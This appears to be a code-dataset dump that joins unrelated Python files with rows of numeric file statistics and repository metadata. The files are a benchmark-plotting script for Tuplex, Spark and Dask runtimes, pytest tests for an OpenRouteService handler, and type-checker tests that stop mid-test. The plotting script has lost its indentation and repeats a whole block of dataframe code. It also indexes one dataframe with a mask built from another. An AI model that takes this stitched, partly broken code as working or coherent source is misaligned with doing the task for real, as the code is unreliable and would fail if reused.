dask_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'dask']['job_time']])
tplx_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'tuplex']['job_time']])
plt_bar(ax, 0, df_mt_mu[df_mt_mu['framework'] == 'dask']['job_time'], w, dask_col,
'Dask', 'center', precision=precision, yerr=dask_time_err)
plt_bar(ax, 4, df_mt_mu[df_mt_mu['framework'] == 'tuplex']['job_time'], w, tplx_col,
'Tuplex', 'above', above_offset=ao, precision=precision, yerr=tplx_time_err)
ax.axvline(4.5, linestyle='--', lw=2, color=[.6, .6, .6])
plt_bar(ax, 5, spark_scala_time, w, scala_col,
'Scala', 'above', above_offset=ao, precision=precision, yerr=spark_scala_time_err)
legend_elements = [
Line2D([0], [0], marker='o', color='w', label='PySpark',
markerfacecolor=pyspark_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='PySpark',
markerfacecolor=pysparksql_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Dask',
markerfacecolor=dask_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Tuplex',
markerfacecolor=tplx_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='SparkSQL(Scala)',
markerfacecolor=scala_col, markersize=mks), ]
# disable legend, use from Z1
# L = ax.legend(handles=legend_elements, loc='upper right', fontsize=15,
# bbox_to_anchor=(1, 1), borderaxespad=-.4, handletextpad=0., ncol=2, columnspacing=0)
# cols = [ pyspark_col, pysparksql_col, dask_col, tplx_col, scala_col]
# for i, text in enumerate(L.get_texts()):
# text.set_color(cols[i])
ax.set_xticks([0, 1, 2, 3, 4, 5])
ax.set_xticklabels(['Dask', 'SQL', 'dict', 'tuple', 'Tuplex', 'Scala'], rotation=rot)
ax.grid(axis='x')
sns.despine()
ax.set_ylim(0, 65)
ax.set_xlim(-.5, 5.5)
ax.set_xlabel('({}b) 16x parallelism'.format(query_name), fontsize=27, labelpad=15)
# ax.set_ylabel('runtime in s', labelpad=-5)
plt.savefig(os.path.join(output_folder, 'figure3_zillow_10G_{}.pdf'.format(query_name)), transparent=True, bbox_inches='tight', pad_inches=0)
def figure7(df_Z1, output_folder):
# ## Zillow Z1 CPython vs. Pypy3
st_fws = ['tuplex', 'cython', 'nuitka', 'python3', 'c++', 'pandas', 'scala']
mt_fws = ['tuplex', 'spark', 'dask']
# which df to use?
df = df_Z1.copy()
# drop tuplex preload
df = df[df['type'] != 'single-threaded-preload']
query_name = 'Z1'
df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
df_mt = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(mt_fws))]
df_mt = df_mt[~df_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
df_mt_mu = df_mt.groupby(['framework', 'type']).mean().reset_index()
df_mt_std = df_mt.groupby(['framework', 'type']).std().reset_index()
pp_st = df[(df['mode'].isin(['pypy3'])) & (df['framework'].isin(st_fws))]
pp_st = pp_st[~pp_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
pp_st_mu = pp_st.groupby(['framework', 'type', 'mode']).mean().reset_index()
pp_st_std = pp_st.groupby(['framework', 'type', 'mode']).std().reset_index()
pp_st_tuple = pp_st_mu[pp_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
pp_st_dict = pp_st_mu[pp_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
pp_st_rest = pp_st_mu[~pp_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
pp_st_tuple_std = pp_st_std[pp_st_std['type'] == 'tuple']
pp_st_dict_std = pp_st_std[pp_st_std['type'] == 'dict']
pp_st_rest_std = pp_st_std[~pp_st_std['type'].isin(['tuple', 'dict'])]
# In[90]:
pp_mt = df[(df['mode'].isin(['pypy3', 'c++'])) & (df['framework'].isin(mt_fws))]
pp_mt = pp_mt[~pp_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
pp_mt_mu = pp_mt.groupby(['framework', 'type', 'mode']).mean().reset_index()
pp_mt_std = pp_mt.groupby(['framework', 'type', 'mode']).std().reset_index()
# links: https://stackoverflow.com/questions/14852821/aligning-rotated-xticklabels-with-their-respective-xticks
sf = 1.1
fig, axs = plt.subplots(figsize=(sf * column_width, sf *column_width / rho * .6),
nrows=1, ncols=2, constrained_layout=True)
rot = 25
mks = 20
w = .8
w2 = w/2
w4 = w/4
precision = 1
data_fsize=26
cc_col = [0, 0, 0]
tplx_col = sns.color_palette()[0]
dask_col = np.array(sns.color_palette()[3])
pyspark_col = 1.2 * np.array(sns.color_palette()[2])
pysparksql_col = 0.6 * np.array(pyspark_col)
py_col = pyspark_col
cython_col = [161/255., 67/255., 133/255.]
nuitka_col = [123/255, 88/255, 219/255.]
base_gray = np.array([0.8, .8, .8])
alpha = 0.1
py_col_g = alpha * np.array(py_col) + (1. - alpha) * base_gray
dask_col_g = alpha * dask_col + (1. - alpha) * base_gray
pyspark_col_g = alpha * np.array(pyspark_col) + (1. - alpha) * base_gray
pysparksql_col_g = alpha * np.array(pysparksql_col) + (1. - alpha) * base_gray
axs = list(axs.flat)
lim_high=90
ao = 5
##### SINGLE-THREADED ######
ax = axs[0]
python3_dict_err = np.array([df_st_dict_std[df_st_dict_std['framework'] == 'python3']['job_time']])
python3_tuple_err = np.array([df_st_tuple_std[df_st_tuple_std['framework'] == 'python3']['job_time']])
pandas_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'pandas']['job_time']])
tplx_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'tuplex']['job_time']])
cc_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'c++']['job_time']])
scala_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'scala']['job_time']])
py_err = np.array([df_st_dict_std[df_st_dict_std['framework'] == 'python3']['job_time']])
pypy_err = np.array([pp_st_dict_std[pp_st_dict_std['framework'] == 'python3']['job_time']])
plt_bar(ax, -w4, df_st_dict[df_st_dict['framework'] == 'python3']['job_time'], w2, py_col_g, 'Python', yerr=py_err)
plt_bar(ax, w4, pp_st_dict[pp_st_dict['framework'] == 'python3']['job_time'], w2, py_col, 'Pypy', yerr=pypy_err)
py_err = np.array([df_st_tuple_std[df_st_tuple_std['framework'] == 'python3']['job_time']])
pypy_err = np.array([pp_st_tuple_std[pp_st_tuple_std['framework'] == 'python3']['job_time']])
plt_bar(ax, 1-w4, df_st_tuple[df_st_tuple['framework'] == 'python3']['job_time'], w2, py_col_g, 'Python', yerr=py_err)
plt_bar(ax, 1+w4, pp_st_tuple[pp_st_tuple['framework'] == 'python3']['job_time'], w2, py_col, 'Python', yerr=pypy_err)
py_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'pandas']['job_time']])
pypy_err = np.array([pp_st_rest_std[pp_st_rest_std['framework'] == 'pandas']['job_time']])
plt_bar(ax, 2-w4, df_st_rest[df_st_rest['framework'] == 'pandas']['job_time'], w2, dask_col_g,
'Pandas', yerr=pandas_err)
plt_bar(ax, 2+w4, pp_st_rest[pp_st_rest['framework'] == 'pandas']['job_time'], w2, dask_col,
'Pandas', yerr=pypy_err)
tplx_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'tuplex']['job_time']])
cc_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'c++']['job_time']])
plt_bar(ax, 3, df_st_rest[df_st_rest['framework'] == 'tuplex']['job_time'], w2, tplx_col, 'Tuplex',
'above', precision=precision, above_offset=ao*10, yerr=tplx_err, fsize=data_fsize)
plt_bar(ax, 4, df_st_rest[df_st_rest['framework'] == 'c++']['job_time'], w2, cc_col, 'C++',
'above', precision=precision, above_offset=ao*10, yerr=cc_err, fsize=data_fsize)
ax.axvline(3.5, linestyle='--', lw=2,color=[.6,.6,.6])
# legend_elements = [ Line2D([0], [0], marker='o', color='w', label='Python ',
# markerfacecolor=py_col, markersize=mks),
# Line2D([0], [0], marker='o', color='w', label='Pandas',
# markerfacecolor=dask_col, markersize=mks),
# Line2D([0], [0], pickradius=2, marker='o', color='w', label='Tuplex',
# markerfacecolor=tplx_col, markersize=mks),
# Line2D([0], [0], pickradius=2, marker='o', color='w', label='C++ (hand-opt.)',
# markerfacecolor=cc_col, markersize=mks)]
# L = ax.legend(handles=legend_elements, loc='upper right', fontsize=18, bbox_to_anchor=(1, 1), borderaxespad=0.)
# cols = [py_col, dask_col, tplx_col, cc_col]
# for i, text in enumerate(L.get_texts()):
# text.set_color(cols[i])
ax.set_xticks([0, 1, 2, 3, 4])
ax.set_xticklabels(['dict', 'tuple', 'Pandas', 'Tuplex', 'C++'], rotation=rot)
ax.grid(axis='x')
sns.despine()
ax.set_ylim(0, 10*lim_high)
ax.set_xlim(-.5, 4.5)
ax.set_yticks([200, 400, 600])
ax.set_xlabel('(a) single-threaded', fontsize=27, labelpad=10)
ax.set_ylabel('runtime in s', labelpad=5)
##### MULTI-THREADED ######
ax = axs[1]
spark_sql_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'sql')]['job_time']
spark_tuple_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'tuple')]['job_time']
spark_dict_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'dict')]['job_time']
spark_sql_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'sql')]['job_time']])
spark_tuple_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'tuple')]['job_time']])
spark_dict_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'dict')]['job_time']])
pp_spark_sql_time = pp_mt_mu[(pp_mt_mu['framework'] == 'spark') & (pp_mt_mu['type'] == 'sql')]['job_time']
pp_spark_tuple_time = pp_mt_mu[(pp_mt_mu['framework'] == 'spark') & (pp_mt_mu['type'] == 'tuple')]['job_time']
pp_spark_dict_time = pp_mt_mu[(pp_mt_mu['framework'] == 'spark') & (pp_mt_mu['type'] == 'dict')]['job_time']
pp_spark_sql_time_err = np.array([pp_mt_std[(pp_mt_std['framework'] == 'spark') & (pp_mt_std['type'] == 'sql')]['job_time']])
pp_spark_tuple_time_err = np.array([pp_mt_std[(pp_mt_std['framework'] == 'spark') & (pp_mt_std['type'] == 'tuple')]['job_time']])
pp_spark_dict_time_err = np.array([pp_mt_std[(pp_mt_std['framework'] == 'spark') & (pp_mt_std['type'] == 'dict')]['job_time']])
plt_bar(ax, -w4, spark_dict_time, w2, pyspark_col_g, 'PySpark (dict)', yerr=spark_dict_time_err)
plt_bar(ax, w4, pp_spark_dict_time, w2, pyspark_col, 'PySpark (dict)', yerr=pp_spark_dict_time_err)
plt_bar(ax, 1-w4, spark_tuple_time, w2, pyspark_col_g, 'PySpark (tuple)', yerr=spark_tuple_time_err)
plt_bar(ax, 1+w4, pp_spark_tuple_time, w2, pyspark_col, 'PySpark (tuple)', yerr=pp_spark_tuple_time_err)
plt_bar(ax, 2-w4, spark_sql_time, w2, pysparksql_col_g, 'PySparkSQL', yerr=spark_sql_time_err)
plt_bar(ax, 2+w4, pp_spark_sql_time, w2, pysparksql_col, 'PySparkSQL', yerr=pp_spark_sql_time_err)
dask_py_err = np.array([df_mt_std[df_mt_std['framework'] == 'dask']['job_time']])
dask_pypy_err = np.array([pp_mt_std[df_mt_std['framework'] == 'dask']['job_time']])
plt_bar(ax, 3-w4, df_mt_mu[df_mt_mu['framework'] == 'dask']['job_time'], w2, dask_col_g,'Dask', yerr=dask_py_err)
plt_bar(ax, 3+w4, pp_mt_mu[df_mt_mu['framework'] == 'dask']['job_time'], w2, dask_col,'Dask', yerr=dask_pypy_err)
tplx_err = np.array([df_mt_std[df_mt_std['framework'] == 'tuplex']['job_time']])
plt_bar(ax, 4, df_mt_mu[df_mt_mu['framework'] == 'tuplex']['job_time'], w2, tplx_col,
'Tuplex', 'above', above_offset=ao, precision=precision, yerr=tplx_err, fsize=data_fsize)
legend_elements = [ Line2D([0], [0], marker='o', color='w', label='Python / PySpark',
markerfacecolor=pyspark_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='PySparkSQL',
markerfacecolor=pysparksql_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Pandas / Dask',
markerfacecolor=dask_col, markersize=mks),
Line2D([0], [0], marker='o', color='w', label='Tuplex',
markerfacecolor=tplx_col, markersize=mks),
Line2D([0], [0], pickradius=2, marker='o', color='w', label='C++ (hand-opt.)',
markerfacecolor=cc_col, markersize=mks)]
L = fig.legend(handles=legend_elements, loc='upper right', bbox_transform = plt.gcf().transFigure,
bbox_to_anchor = (0.01,0,1,1), fontsize=17,
borderaxespad=0.4, handletextpad=0., ncol=5, columnspacing=0)
cols = [pyspark_col, pysparksql_col, dask_col, tplx_col, cc_col]
for i, text in enumerate(L.get_texts()):
text.set_color(cols[i])
ax.set_xticks([0, 1, 2, 3, 4])
ax.set_xticklabels(['dict', 'tuple', 'SQL', 'Dask', 'Tuplex'], rotation=rot)
ax.grid(axis='x')
sns.despine()
ax.set_ylim(0, lim_high)
ax.set_xlim(-.5, 4.5)
ax.set_yticks([20, 40, 60])
ax.set_xlabel('(b) 16x parallelism', fontsize=27, labelpad=10)
# ax.set_ylabel('runtime in s', labelpad=-5)
plt.savefig(os.path.join(output_folder, 'figure7_zillow_Z1_10G_pypy.pdf'), transparent=True, bbox_inches = 'tight', pad_inches = 0)
| 51.106502
| 193
| 0.570382
| 6,339
| 45,587
| 3.823789
| 0.065152
| 0.038946
| 0.018771
| 0.019803
| 0.835719
| 0.810017
| 0.782788
| 0.75032
| 0.729444
| 0.707455
| 0
| 0.023532
| 0.241209
| 45,587
| 892
| 194
| 51.106502
| 0.677199
| 0.071161
| 0
| 0.544
| 0
| 0.0032
| 0.167962
| 0.004622
| 0
| 0
| 0
| 0.001121
| 0
| 1
| 0.008
| false
| 0.0016
| 0.0256
| 0
| 0.0368
| 0.0016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7713334451d3b2aa2bf2e20fc574a1c5b413da32
| 2,593
|
py
|
Python
|
openrouteservice_handler/test_openrouteservice_handler.py
|
ThorsHamster/find_new_hometown
|
862231bb1f3a0a1505d02b452adca2b45a6fc850
|
[
"MIT"
] | 2
|
2020-01-07T07:28:17.000Z
|
2020-01-07T10:21:41.000Z
|
openrouteservice_handler/test_openrouteservice_handler.py
|
ThorsHamster/find_new_hometown
|
862231bb1f3a0a1505d02b452adca2b45a6fc850
|
[
"MIT"
] | 30
|
2021-03-19T15:46:29.000Z
|
2021-12-21T12:22:50.000Z
|
openrouteservice_handler/test_openrouteservice_handler.py
|
ThorsHamster/find_new_hometown
|
862231bb1f3a0a1505d02b452adca2b45a6fc850
|
[
"MIT"
] | null | null | null |
import pytest
from openrouteservice_handler import OpenRouteServiceHandler
class MockCoordinate:
def __init__(self):
self.longitude = 0
self.latitude = 0
@pytest.fixture
def unit_under_test(mocker):
return OpenRouteServiceHandler('api_key')
def test_get_distance_duration_between_cities_standard_layout(unit_under_test, mocker):
mocker.patch('openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.distance_matrix',
return_value={'distances': [[0, 3], [0, 0]], 'durations': [[0, 7], [0, 0]]})
distance, duration = unit_under_test.get_distance_duration_between_cities(MockCoordinate(),
MockCoordinate())
assert distance == 3
assert duration == 7
def test_get_distance_duration_between_cities_switched_layout(unit_under_test, mocker):
mocker.patch('openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.distance_matrix',
return_value={'distances': [[0, 0], [3, 0]], 'durations': [[0, 0], [7, 0]]})
distance, duration = unit_under_test.get_distance_duration_between_cities(MockCoordinate(),
MockCoordinate())
assert distance == 3
assert duration == 7
def test_get_distance_duration_between_cities_no_return_value(unit_under_test, mocker):
mocker.patch('openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.distance_matrix',
return_value=None)
with pytest.raises(ValueError, match='Could not collect data from OpenRouteService. Maybe wrong api key?'):
unit_under_test.get_distance_duration_between_cities(MockCoordinate(), MockCoordinate())
def test_get_coordinate_of_city_city_found(unit_under_test, mocker):
mocker.patch('openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.pelias_search',
return_value={'features': [{'geometry': {'coordinates': [3, 7]}}]})
coordinates = unit_under_test.get_coordinate_of_city('test_city')
assert coordinates.longitude == 3
assert coordinates.latitude == 7
def test_get_coordinate_of_city_city_not_found(unit_under_test, mocker):
mocker.patch('openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.pelias_search',
return_value=None)
with pytest.raises(ValueError, match='Could not collect data from OpenRouteService. Maybe wrong api key?'):
unit_under_test.get_coordinate_of_city('test_city')
| 42.508197
| 111
| 0.715773
| 284
| 2,593
| 6.172535
| 0.211268
| 0.144324
| 0.081574
| 0.065031
| 0.800342
| 0.800342
| 0.800342
| 0.743868
| 0.743868
| 0.707359
| 0
| 0.012411
| 0.192056
| 2,593
| 60
| 112
| 43.216667
| 0.824344
| 0
| 0
| 0.435897
| 0
| 0
| 0.254917
| 0.170073
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.179487
| false
| 0
| 0.051282
| 0.025641
| 0.282051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
91f1a382e9cb9885851e05853c7c065c0b6e9a04
| 34,094
|
py
|
Python
|
checkerpy/tests/types/all/test_all.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | 1
|
2018-01-12T19:20:51.000Z
|
2018-01-12T19:20:51.000Z
|
checkerpy/tests/types/all/test_all.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
checkerpy/tests/types/all/test_all.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
import logging
import unittest as ut
from collections import defaultdict, deque, OrderedDict
from ....functional import CompositionOf
from ....types.all import All
from ....types.one import _REDUCED_ITER
from ....exceptions import WrongTypeError, IterError, CallableError
class TestAllInstatiation(ut.TestCase):
def test_error_on_wrong_identifier(self):
err_msg = 'Type-checker name @foo is not a valid identifier!'
with self.assertRaises(ValueError) as err:
_ = All(int, identifier='@foo')
self.assertEqual(str(err.exception), err_msg)
def test_has_default_name(self):
AllInt = All(int)
self.assertEqual(AllInt.__name__, 'All')
def test_identifier_sets_name_attribute(self):
AllInt = All(int, identifier='AllInt')
self.assertEqual(AllInt.__name__, 'AllInt')
def test_has_attribute_types_with_one_valid_type(self):
AllInt = All(int)
self.assertTrue(hasattr(AllInt, 'types'))
def test_cannot_set_attribute_types(self):
AllInt = All(int)
with self.assertRaises(AttributeError):
AllInt.types = 'foo'
def test_attribute_types_has_correct_value_with_one_valid_type(self):
AllInt = All(int)
self.assertTupleEqual(AllInt.types, (int, ))
def test_works_with_two_valid_types(self):
_ = All(int, float)
def test_has_attribute_types_with_two_valid_types(self):
AllNum = All(int, float)
self.assertTrue(hasattr(AllNum, 'types'))
def test_attribute_types_has_correct_value_with_two_valid_types(self):
AllNum = All(int, float)
self.assertTupleEqual(AllNum.types, (int, float))
class TestAllWorks(ut.TestCase):
def test_works_with_str(self):
AllStr = All(str)
s = AllStr('foo')
self.assertIsInstance(s, str)
self.assertEqual(s, 'foo')
def test_works_with_tuple(self):
AllStr = All(str)
t = AllStr(('f', 'o', 'o'))
self.assertTupleEqual(t, ('f', 'o', 'o'))
def test_works_with_list(self):
AllStr =All(str)
l = AllStr(['f', 'o', 'o'])
self.assertListEqual(l, ['f', 'o', 'o'])
def test_works_with_deque(self):
AllStr =All(str)
dq = AllStr(deque(['f', 'o', 'o']))
self.assertIsInstance(dq, deque)
self.assertEqual(dq, deque(['f', 'o', 'o']))
def test_works_with_set(self):
AllStr = All(str)
s = AllStr({'f', 'o', 'o'})
self.assertSetEqual(s, {'f', 'o'})
def test_works_with_frozenset(self):
AllStr = All(str)
s = AllStr(frozenset({'f', 'o', 'o'}))
self.assertSetEqual(s, {'f', 'o'})
def test_works_with_dict(self):
AllStr = All(str)
d = AllStr({'f': 1, 'o': 2})
self.assertDictEqual(d, {'f': 1, 'o': 2})
def test_works_ordered_dict(self):
AllStr = All(str)
od = AllStr(OrderedDict({'f': 1, 'o': 2}))
self.assertIsInstance(od, OrderedDict)
self.assertDictEqual(od, {'f': 1, 'o': 2})
def test_works_with_defaultdict(self):
AllStr = All(str)
dd = AllStr(defaultdict(int, {'f': 1, 'o': 2}))
self.assertDictEqual(dd, {'f': 1, 'o': 2})
def test_works_with_dict_keys(self):
AllStr = All(str)
d = AllStr({'f': 1, 'o': 2}.keys())
self.assertIsInstance(d, type({}.keys()))
self.assertSetEqual(set(d), set({'f': 1, 'o': 2}.keys()))
def test_works_with_ordered_dict_keys(self):
AllStr = All(str)
od = OrderedDict({'f': 1, 'o': 2})
output = AllStr(od.keys())
self.assertIsInstance(output, type(od.keys()))
self.assertSetEqual(set(od.keys()), set(output))
def test_works_with_defaultdict_keys(self):
AllStr = All(str)
dd = defaultdict(int, {'f': 1, 'o': 2})
output = AllStr(dd.keys())
self.assertIsInstance(output, type(dd.keys()))
self.assertSetEqual(set(dd.keys()), set(output))
def test_works_with_dict_values(self):
AllInt = All(int)
d = AllInt({'f': 1, 'o': 2}.values())
self.assertIsInstance(d, type({}.values()))
self.assertSetEqual(set(d), set({'f': 1, 'o': 2}.values()))
def test_works_with_ordered_dict_values(self):
AllInt = All(int)
od = OrderedDict({'f': 1, 'o': 2})
output = AllInt(od.values())
self.assertIsInstance(output, type(od.values()))
self.assertSetEqual(set(od.values()), set(output))
def test_works_with_defaultdict_values(self):
AllInt = All(int)
dd = defaultdict(int, {'f': 1, 'o': 2})
output = AllInt(dd.values())
self.assertIsInstance(output, type(dd.values()))
self.assertSetEqual(set(dd.values()), set(output))
def test_returns_correct_type_with_two_types(self):
AllNum = All(int, float)
i = AllNum((1, ))
self.assertIsInstance(i, tuple)
f = AllNum([1.0])
self.assertIsInstance(f, list)
def test_returns_correct_value_with_two_types(self):
AllNum = All(int, float)
self.assertTupleEqual(AllNum((2, )), (2, ))
self.assertListEqual(AllNum([2.0]), [2.0])
class TestAllErrorUnnamedOneType(ut.TestCase):
def test_error_on_unnamed_variable_not_iterable(self):
AllInt = All(int)
log_msg = ['ERROR:root:Variable 3 with type int does not seem'
' to be an iterable with elements to inspect!']
err_msg = ('Variable 3 with type int does not seem to'
' be an iterable with elements to inspect!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(IterError) as err:
_ = AllInt(3)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_named_variable_not_iterable(self):
AllInt = All(int)
log_msg = ['ERROR:root:Variable test with type int does not '
'seem to be an iterable with elements to inspect!']
err_msg = ('Variable test with type int does not seem '
'to be an iterable with elements to inspect!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(IterError) as err:
_ = AllInt(3, 'test')
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_tuple_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element 1 in tuple (4,'
' 5.0) must be int, not float like 5.0!']
err_msg = ('Type of element 1 in tuple (4, 5.0)'
' must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt((4, 5.0))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_list_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element 1 in list [4,'
' 5.0] must be int, not float like 5.0!']
err_msg = ('Type of element 1 in list [4, 5.0]'
' must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt([4, 5.0])
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_deque_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of element 1 in deque([4,'
' 5.0]) must be int, not float like 5.0!']
err_msg = ('Type of element 1 in deque([4, 5.0])'
' must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(deque([4, 5.0]))
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_dict_with_one_type(self):
AllInt = All(int)
inputs = {4: 'four', 5.0: 'five'}
log_msg = ["ERROR:root:Type of key in dict {4: 'four', "
"5.0: 'five'} must be int, not float like 5.0!"]
err_msg = ("Type of key in dict {4: 'four', 5.0: "
"'five'} must be int, not float like 5.0!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_ordered_dict_with_one_type(self):
AllInt = All(int)
inputs = OrderedDict({4: 'four', 5.0: 'five'})
log_msg = ["ERROR:root:Type of key in OrderedDict([(4, 'four'),"
" (5.0, 'five')]) must be int, not float like 5.0!"]
err_msg = ("Type of key in OrderedDict([(4, 'four'), (5.0,"
" 'five')]) must be int, not float like 5.0!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_defaultdict_with_one_type(self):
AllInt = All(int)
inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
log_msg = ["ERROR:root:Type of key in defaultdict(<class 'str'>, {4:"
" 'four', 5.0: 'five'}) must be int, not float like 5.0!"]
err_msg = ("Type of key in defaultdict(<class 'str'>, {4: 'four',"
" 5.0: 'five'}) must be int, not float like 5.0!")
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs)
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_dict_key_with_one_type(self):
AllInt = All(int)
log_msg = ['ERROR:root:Type of key in dict_keys([4,'
' 5.0]) must be int, not float like 5.0!']
err_msg = ('Type of key in dict_keys([4, 5.0])'
' must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt({4: 'four', 5.0: 'five'}.keys())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_ordered_dict_key_with_one_type(self):
AllInt = All(int)
inputs = OrderedDict({4: 'four', 5.0: 'five'})
log_msg = ['ERROR:root:Type of key in odict_keys([4,'
' 5.0]) must be int, not float like 5.0!']
err_msg = ('Type of key in odict_keys([4, 5.0])'
' must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(WrongTypeError) as err:
_ = AllInt(inputs.keys())
self.assertEqual(str(err.exception), err_msg)
self.assertEqual(log.output, log_msg)
def test_error_on_wrong_unnamed_defaultdict_key_with_one_type(self):
AllInt = All(int)
inputs = defaultdict(str, {4: 'four', 5.0: 'five'})
log_msg = ['ERROR:root:Type of key in dict_keys([4,'
' 5.0]) must be int, not float like 5.0!']
err_msg = ('Type of key in dict_keys([4, 5.0])'
' must be int, not float like 5.0!')
with self.assertLogs(level=logging.ERROR) as log:
